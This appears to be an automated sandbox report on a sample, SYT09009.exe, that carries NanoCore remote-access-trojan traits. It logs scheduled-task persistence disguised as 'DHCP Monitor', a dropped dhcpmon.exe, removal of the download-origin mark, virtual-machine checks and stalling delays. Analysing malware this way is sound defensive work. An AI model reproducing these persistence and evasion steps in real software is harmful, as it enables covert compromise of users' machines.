Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA63C.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpA9C7.tmp'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SYT09009.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\SYT09009.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA63C.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpA9C7.tmp'	Jump to behavior

Source: C:\Users\user\Desktop\SYT09009.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: SYT09009.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: SYT09009.exe, 00000000.00000003.243744964.0000000002B40000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: SYT09009.exe, 00000000.00000003.243744964.0000000002B40000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp
Source:	Binary string: f:\dd\vsproject\xmake\XMakeCommandLine\objr\i386\MSBuild.pdb source: dhcpmon.exe, dhcpmon.exe.1.dr
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 6_2_012A292C push cs; ret		6_2_012A2936
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_0112271D push cs; ret		12_2_01122722

Source: C:\Users\user\Desktop\SYT09009.exe	File created: C:\Users\user\AppData\Local\Temp\nsg940D.tmp\qp16430yyukg.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA63C.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\SYT09009.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\SYT09009.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Window / User API: threadDelayed 366	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Window / User API: foregroundWindowGot 654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Window / User API: foregroundWindowGot 611	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 5432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 3440	Thread sleep time: -280000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 3888	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF
Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
